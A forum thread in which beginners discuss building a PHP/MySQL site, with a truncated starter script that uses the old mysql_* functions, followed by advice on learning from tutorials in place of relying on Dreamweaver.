Here you go - this is a very basic page which will get records from a database and list the result. It has everything you need to make the connection and get the list. It is not the only way to do it, it is meant to serve as a starting point - look at each line and make sure you know what it is doing and then get editing - you will need to edit the variables at the top anyway to make it work with your database:

<?php
 //Database server address - usually localhost or 127.0.0.1:
$host = '127.0.0.1';
 // Speaks for itself:
$usr = 'database user name goes here';
 // likewise:
$pword = 'database password goes here';
 // likewise:
$dbase = 'database name goes here';
 // likewise:
$db_table = 'database table name goes here';
 // likewise:
$db_field = 'database field name goes here';
 // Creates an empty variable which will contain your output later in the script:
$my_output = '';
 // Connects to the database:
mysql_connect($host, $usr, $pword) or die(mysql_error());
 // Selects the table in the database:
mysql_select_db($dbase) or die(mysql_error());
 // This forms the question (what are the details held in the field for all records in the table?) and puts it into …

only reason i mentioned dreamweaver as someone told me all you need to do is ceate the mysql database and then dreamweaver will sort the rest out lol
cheers

That's more or less how I stumbled through my first application (a gig listing/booking thingie for my band) - Dreamweaver basically did it for me, it was very simple. In the end I started coding my applications without Dreamweaver's help because it is more efficient and versatile.

If you are starting from scratch then before you get down to the specifics of your app I would suggest that you write some test scripts so you learn the basics - figure how to:

Read the database
Add a record to the database
Edit a record in the database
Delete a record from the database

This will help: http://www.w3schools.com/PHP/php_mysql_intro.asp
Follow the tutorial and you'll figure it out, you won't need Dreamweaver, any text editor will do.

Then you can get down to the specifics of your app. Keep it simple to start. You're going to need some sort of login process I guess so I would start there.

I started out using Dreamweaver for HTML/CSS. I noticed some bits I didn't understand so I clicked and tried - next thing you know I've got a database driven website. It was a great way to start, just waking me up to the possibilities of PHP/database stuff but it didn't take long before I realised that the 'Dreamweaver Way' led to large amounts of unnecessary and inflexible code.

So I started looking at, as mentioned above, tizag and W3schools - fantastic - didn't take long before I was writing my own code and not using Dreamweaver generated code at all.

I still use Dreamweaver but really only as a kind of notepad on steroids and I find the site/file management stuff handy. I would not buy it again if I was starting from scratch.

I think I would use Eclipse and Nvu if I didn't already have Dreamweaver ('cos they're free!).

How do you know whether a user is an admin or a regular member? If it is a database field then simply display that as well.